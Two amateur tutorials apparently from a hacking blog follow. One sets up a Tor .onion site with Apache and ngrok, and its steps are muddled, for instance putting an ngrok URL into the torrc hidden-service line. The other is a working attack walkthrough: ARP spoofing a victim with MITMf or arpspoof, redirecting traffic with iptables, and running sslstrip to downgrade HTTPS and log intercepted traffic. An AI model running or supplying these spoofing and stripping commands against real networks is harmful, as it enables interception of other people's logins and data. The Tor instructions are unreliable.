Create Your Own DarkWeb site | Onion link | Port Forward | Host on WAN

DarkWeb site with tor on linux

DarkWeb is very usefull to be anonymous you can get you own .onion website and host on wide area network free.
i assume you are using kali linux or parrot sec os open terminal and install tor sudo apt-get install tor after you just need to edit some in configuration file of tor.

open terminal and type cd /etc/tor and than ls for list dir you will see torrc file there that you have to edit

open this file in your favorite text editor and add two lines
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 <Your local IP>:80
Check your local ip with ifconfig 
open your file manager with root and go in /var/lib/tor/hidden_service there you get your website
and boom you done it at last start tor by sudo service tor start and sudo service apache2 start

NOTE:- Now you face a problem that site cant be reach! Here is the solution

Forward your port | Go on Internet

This is just make a connection between your local ip to the internet so you can access your website worldwide
for more about Port forwarding click here
i suggest you to use NGROK for download click  available for all Systems
after Download you just forward your port with ./ngrok http 80 80 for http so you apache server will be on WAN and your onion site can reach it.
after forward your port you see like this

just copy 4f28046d.ngrok.io this link and paste where you put your local ip if you remember above
in file torrc  and save it again and restart tor again and now you can access your apache site with onion site
paste your website here  /var/www  and boom your website is ready for share on social media.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.


HTTPS downgrade to HTTP | Bypasss HSTS | SSLStrip | ARP poisoning

Introduction of HSTS, ARP, And sslstrip

HTTP Strict Transport Security (HSTS) is a web security which protects against downgrade of protocols and cookies hijacking. The Address Resolution Protocol (ARP) feature performs a required function in IP routing. ARP finds the hardware address, also known as Media Access Control (MAC) address, of a host from its known IP address. ARP maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM force a web browse to stripping https:// URLs and turning them into http:// URLs.

You have to forward IP By IPTables and send a fake arp request Request.

 

Lets Do it.

MITMF -(Framework for Man-In-The-Middle attacks)

https://github.com/byt3bl33d3r/MITMf  just simple download this Framework from git hub (git clone) or sudo apt-get install mitmf
By just mitmf -h you can go in help section

-i: to specify the interface we want to run the MITM attack trough;
–spoof: to redirect or modify the hijacked traffic;
–apr: to specify that we want to redirect the traffic trough ARP spoofing;
–hsts: to load SSLStrip+ plugin;
–dns: to load a proxy to modify DNS queries;
–gateway: to specify the gateway;
–target:to specify the target.

run mitmf –spoof –arp -i <interface name> –target <target IP> –gateway <gateway IP> –hsts

get the target local ip by netdiscover or scan your local ip by nmap and for gateway ip route, or route –n

SSlStrip

Open terminal and forward Ip by echo 1 > /proc/sys/net/ipv4/ip_forward

start arpspoof by arpspoof -i eth0 -t victimip default_gateway_ip

Setting up port redirection using Iptables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

finally Launch sslstrip sslstrip –l 10000

now open new terminal  and see results tail -n 50 -f sslstrip.log

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.

Hope you had a nice reading, comming back to hacknews.